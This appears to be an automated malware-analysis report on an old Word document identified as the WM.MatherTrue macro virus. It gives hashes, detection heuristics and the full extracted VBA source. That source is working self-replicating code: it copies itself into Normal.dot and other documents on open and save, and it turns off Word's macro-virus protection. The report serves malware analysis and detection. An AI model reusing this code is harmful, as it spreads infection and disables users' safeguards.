Office (OLE) malware analysis — malicious · 990b94bb0b01b507

MALICIOUS

Office (OLE)

35.5 KB Created: 1997-07-07 09:37:00 Authoring application: Microsoft Word 8.0 First seen: 2012-10-03

MD5: e80226b7de9c32c543b2f8616357916c SHA-1: e77577c19c801a51509c100fc0cad0a4a7599d37 SHA-256: 990b94bb0b01b50718c74c4e3a2216f729f4c6a32b5c34b89e8d8580bbae2663

228 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The sample exhibits characteristics of a legacy WordBasic macro-virus, specifically triggering on 'ToolsMacro' and 'AutoOpen'. While the VBA code is truncated, the presence of these markers and the ClamAV detection of 'Win.Trojan.C-286' strongly indicate malicious intent, likely to execute further payloads.

Heuristics 5

VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
                .VirusProtection = False
```
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Public Sub AutoOpen()
```
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS

OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 36,352 bytes but its declared streams total only 16,490 bytes — 19,862 bytes (55%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	7029 bytes
SHA-256: `4f2365f211bff973e9feec6a07e21d83c72b1abff9aa65ef666f1b7378ebaa9e`
Detection ClamAV: Win.Trojan.C-286 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "MatherTrue" Option Explicit Dim ResultFDoc As Boolean 'True åñëè â àêòèâíîì äîêóìåíòå åñòü ìîäóëü ñ èìåíåì Ìname Dim ResultFTemplite As Boolean 'True åñëè â Normal.Dot åñòü ìîäóëü ñ èìåíåì Ìname Dim Path_Normal As String 'ïóòü ê Normal.Dot Dim Path_Doc As String 'ïóòü ê àêòèâíîìó äîêóìåíòó Dim I As Integer 'ïåðåìåííàÿ äëÿ öèêëà Dim HowMach As Integer 'êîëè÷åñòâî ìîäóëåé â ïðîåêòå Dim Doc As Boolean Dim N As Integer Public Const Mname As String = "MatherTrue" 'èìÿ ìîäóëÿ, îòêóäà áðàòü êîä 'Âûçûâàåòüñÿ ïðè íàæàòèè íà êíîïêó Organizer Public Sub Organizer() Attribute Organizer.VB_Description = "Ìàêðîñ çàïèñàí 31.03.99 33715351" Attribute Organizer.VB_ProcData.VB_Invoke_Func = "Normal.NewMacros.DS" CommandBars("Visual Basic").Enabled = True With CommandBars("Macro") For I = 1 To .Controls.Count .Controls(I).Enabled = False Next I End With ShowVisualBasicEditor = False Application.DisplayStatusBar = True With Options .VirusProtection = False .AllowFastSave = True .SaveInterval = 3 End With End Sub 'Âûçûâàåòüñÿ ïðè íàæàòèè íà êíîïêó Macro Public Sub ToolsMacro() End Sub 'Âûçûâàåòüñÿ ïðè ñîçäàíèè íîâîãî äîêóìåíòà (ïðè çàïóñêå Word'à íîâûé äîêóìåíò ñîçäà¸òüñÿ àâòîìàòè÷åñêè) Public Sub AutoNew() Call Organizer End Sub 'Âûçûâàåòüñÿ ïðè àêòèâèçàöèè ðåæèìà ñîõðàíåíèÿ àêòèâíîãî äîêóìåíòà èëè øàáëîíà (íàæàòèè íà êíîïêó "Ñîõðàíèòü") Public Sub FileSave() Doc = False N = Len(ActiveDocument.Name) If N < 10 Then N = 1 If N >= 10 And N <= 99 Then N = 2 If N >= 99 And N <= 1000 Then N = 3 If Mid(ActiveDocument.Name, 1, Len(ActiveDocument.Name) - N) = "Äîêóìåíò" Then Doc = True ShowVisualBasicEditor = True ResultFDoc = False If PrintPreview = False Then HowMach = Application.ActiveDocument.VBProject.VBComponents.Count For I = 1 To HowMach If Mname = Application.ActiveDocument.VBProject.VBComponents(I).Name Then ResultFDoc = True Next I If ResultFDoc <> True Then Path_Normal = Application.NormalTemplate.FullName Path_Doc = Application.ActiveDocument.FullName Application.OrganizerCopy Source:=Path_Normal, Destination:=Path_Doc, Name:=Mname, Object:=wdOrganizerObjectProjectItems Call Organizer End If If Doc = True Then Dialogs(wdDialogFileSaveAs).Show: Exit Sub ActiveDocument.Save End If End Sub 'Âûçûâàåòüñÿ ïðè àêòèâèçàöèè ðåæèìà ñîõðàíåíèÿ âñåõ àêòèâíûõ äîêóìåíòîâ è/èëè øàáëîíîâ (íàæàòèè íà êíîïêó "Ñîõðàíèòü âñå") Public Sub FileSaveAll() ShowVisualBasicEditor = False Call FileSave End Sub 'Âûçûâàåòüñÿ ïðè àêòèâèçàöèè ðåæèìà ïå÷àòè ñ òåêóùèìè óñòàíîâêàìè Public Sub FilePrintDefault() ShowVisualBasicEditor = False ' ActiveDocument.Content.InsertAfter Text:="Âîò òàêàÿ îíà ïðàâäà-ìàìêà, à ïðîòèâ ïðàâäû íå ïîïð¸øü...Ïðèâåò Ìèõàéëîâîé Þëüêå. Coded by DI° WM.MatherTrue - I see, i'm here, i'm conqure ..." ActiveDocument.PrintOut End Sub 'Âûçûâàåòüñÿ ïðè àêòèâèçàöèè äèàëîãîîãî îêíà ïå÷àòè Public Sub FilePrint() ShowVisualBasicEditor = False ' ActiveDocument.Content.InsertAfter Text:="Âîò òàêàÿ îíà ïðàâäà-ìàìêà, à ïðîòèâ ïðàâäû íå ïîïð¸øü...Ïðèâåò Ìèõàéëîâîé Þëüêå. Coded by DI° WM.MatherTrue - I see, i'm here, i'm conqure ... " Dialogs(wdDialogFilePrint).Show End Sub 'Âûçûâàåòüñÿ ïðè îòêðûòèè äîêóìåíòà/øàáëîíà 'èíñòàëÿöèÿ êîäà â Normal.Dot Public Sub AutoOpen() ResultFTemplite = False If PrintPreview = False Then HowMach = Application.NormalTemplate.VBProject.VBComponents.Count For I = 1 To HowMach If Mname = Application.NormalTemplate.VBProject.VBComponents(I).Name Then ResultFTemplite = True Next I If ResultFTemplite <> True Then Path_Normal = Application.NormalTemplate.FullName Path_Doc = Application.ActiveDocument.FullName Application.OrganizerCopy Source:=Path_Doc, Destination:=Path_Normal, Name:=Mname, Object:=wdOrganizerObjectProjectItems End If End If End Sub ' Destroyer Inc° Or PIPA's E&CS™ Company presented the ' MacroVirus WM.MatherTrue ' (C) CopyRight 16.04.1999 Ukrein Hmelnitsky ' WM.MatherTrue Was Make In Ms Offise (MS Word - 8.0) ' Hackers And VirusMakers All Country - UNITED !!! ' "Virus For PC, PC For Virus" ' Big Hy For VRV Virus Production™, Predator'S°,SNAKE,S@S,DM,AlexHelraiser by Destroyer Inc ° ' ÄÅÌÁÅËÜ íå èçáåæåí !!!' ÀÐÈß áåññìåðòíà !!! ÀÐÈß The Best !!! ' ' ##### ###### ##### ####### ###### #### # # ###### ###### ' # ## # # # # # # # # # # # # # # # ' # ## # # # # # # # # # # # # # # ' # # ### ##### # ###### # # #### # ### ###### ' # ## # # # # # # # # # # # # # ' # ## # # # # # # # # # # # # # # ' ##### ###### ##### # # # #### #### ###### # # ' ' ' ####### # # ####### ## ' # ## # # # ## ' # # # # # ' # # # # # ' # # # # # ' # # ## # ' ####### # # ####### ' '

Open this report in the interactive analyzer, or submit your own file for analysis.